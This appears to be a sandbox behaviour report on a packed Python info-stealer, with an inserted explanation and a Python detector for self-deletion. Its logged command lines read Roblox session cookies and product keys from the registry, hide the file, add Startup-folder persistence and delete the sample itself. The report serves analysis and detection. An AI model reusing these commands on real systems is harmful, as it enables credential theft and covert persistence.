              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windowscodecs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\tree.com | Section loaded: ulib.dll
              Source: C:\Windows\SysWOW64\tree.com | Section loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\attrib.exe | Section loaded: ulib.dll
              Source: C:\Windows\SysWOW64\attrib.exe | Section loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\getmac.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: KpHYfxnJs6.exe | Static file information: File size 9081534 > 1048576
              Source: KpHYfxnJs6.exe | Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x2bac00
              Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2905394504.000000006F911000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\python311.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2898642505.000000006C626000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.pdb source: powershell.exe, 00000046.00000002.2707327914.0000000004ACA000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: KpHYfxnJs6.exe, 00000004.00000002.2897142653.000000006C0A3000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: KpHYfxnJs6.exe, 00000004.00000002.2903601786.000000006F8DB000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2903162092.000000006F8A1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2896773038.000000006BEE2000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdbAA source: KpHYfxnJs6.exe, 00000004.00000002.2896773038.000000006BEE2000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2901778919.000000006F851000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2901169725.000000006F821000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2904571313.000000006F8F1000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2900426461.000000006F811000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2903601786.000000006F8DB000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2900045891.000000006F801000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2895977031.000000006BE70000.00000040.00000001.01000000.00000015.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:09:02 2022 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: KpHYfxnJs6.exe, 00000004.00000002.2897142653.000000006C0A3000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2902247843.000000006F861000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\sqlite3.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006D.00000000.2746843353.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_sqlite3.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2902609939.000000006F881000.00000040.00000001.01000000.0000000C.sdmp

              Data Obfuscation

              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
              Source: initial sample | Static PE information: section where entry point is pointing to: .boot
              Source: KpHYfxnJs6.exe | Static PE information: section name:
              Source: KpHYfxnJs6.exe | Static PE information: section name:
              Source: KpHYfxnJs6.exe | Static PE information: section name:
              Source: KpHYfxnJs6.exe | Static PE information: section name:
              Source: KpHYfxnJs6.exe | Static PE information: section name:
              Source: KpHYfxnJs6.exe | Static PE information: section name: .themida
              Source: KpHYfxnJs6.exe | Static PE information: section name: .boot
              Source: libffi-8.dll.0.dr | Static PE information: section name: UPX2
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Code function: 4_3_075ACD27 push eax; retf 4_3_075ACD2D
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Code function: 4_3_075AF599 pushfd ; ret 4_3_075AF59C
              Source: KpHYfxnJs6.exe | Static PE information: section name: entropy: 7.970952206496813
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: attrib.exe
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\_hashlib.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\_socket.pyd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\_sqlite3.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\_decimal.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\_ctypes.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\_queue.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\libssl-1_1.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\_ssl.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\select.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\python311.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\_bz2.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\libffi-8.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\_lzma.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\sqlite3.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\libcrypto-1_1.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI73202\unicodedata.pyd

              Boot Survival

              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe  Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""
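The cmd.exe line above is the self-deletion step: `ping localhost -n 3` stalls cmd.exe for roughly two seconds so the sample's own process can exit and release its file lock, then `del /A H /F` removes the executable even though it is marked hidden. It is also the strongest host artefact in this stretch of the report; the BitLocker manifest opens are a normal side effect of PowerShell module auto-discovery, and the NOOPENFILEERRORBOX entries record SetErrorMode(SEM_NOOPENFILEERRORBOX), which powershell.exe sets routinely, so neither carries much signal on its own. The Sigma rule "Suspicious Ping/Del Command Combination" listed in the report fires on the delay-then-delete pattern alone; the detector below is an added example (not part of the Joe Sandbox report or of Blank Grabber) that goes one step further and confirms that the deleted path is the parent process's own image, which is what makes it self-deletion rather than generic cleanup. It assumes Sysmon Event ID 1-style field names (Image, ParentImage, CommandLine); the three events are constructed here, with only the first CommandLine copied from the report.

```python
import re

# Constructed Sysmon Event ID 1-style process-creation records. The first
# CommandLine is the one recorded in the report above; the other two are
# made up here to show a non-matching ping and a benign-looking updater.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Users\user\Desktop\KpHYfxnJs6.exe",
        "CommandLine": r'C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""',
    },
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'cmd.exe /c "ping 10.0.0.1 -n 1"',
    },
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\Updater\updater.exe",
        "CommandLine": r'cmd.exe /c "timeout /t 5 & del /F "C:\Program Files\Updater\updater.exe""',
    },
]

# Leading 'cmd.exe /c "' (or /k) wrapper, with or without a full path and quotes.
CMD_WRAPPER = re.compile(r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+"?', re.I)
# cmd.exe command separators; && and || are listed first so they win over & and |.
SEPARATORS = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")
# del/erase followed by switches such as /F, /Q, /A H or /A:H, then the target path.
DEL_CMD = re.compile(r"^(?:del|erase)\b\s*(?:/[A-Za-z](?:[:\s][-A-Za-z]+(?=\s|$))?\s*)*(.*)$", re.I)
# Commands whose only job here is to wait until the parent process has exited.
DELAY_CMD = re.compile(r"^(?:ping|timeout)\b", re.I)


def split_segments(cmdline):
    """Strip the cmd.exe /c wrapper and split the script on its command separators."""
    body = CMD_WRAPPER.sub("", cmdline, count=1)
    return [s.strip() for s in SEPARATORS.split(body) if s.strip()]


def del_target(segment):
    """Return the path a del/erase segment deletes, or None if it is not a del."""
    m = DEL_CMD.match(segment)
    if not m:
        return None
    # Drop the surrounding quotes, including the stray one that closes the /c "..." wrapper.
    target = m.group(1).strip().strip('"')
    return target or None


def detect_self_deletion(event):
    """Flag cmd.exe self-deletion: a delay command followed by del of the parent's own image."""
    segments = split_segments(event["CommandLine"])
    delayed = any(DELAY_CMD.match(s) for s in segments)
    targets = [t for t in map(del_target, segments) if t]
    parent = event.get("ParentImage", "").lower()
    self_deletion = any(t.lower() == parent for t in targets)
    return {
        "delayed": delayed,
        "targets": targets,
        "self_deletion": self_deletion,
        "delayed_self_deletion": delayed and self_deletion,
    }


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["ParentImage"], "->", detect_self_deletion(ev))
```

The second constructed event shows why the parent-image check matters: a bare `ping` is not evidence of anything. The third shows the usual false positive, an installer or updater that removes its own binary the same way; the pattern is identical, so tune on ParentImage location (user-writable directories such as Desktop, Downloads or Temp) rather than on the command line alone.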
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
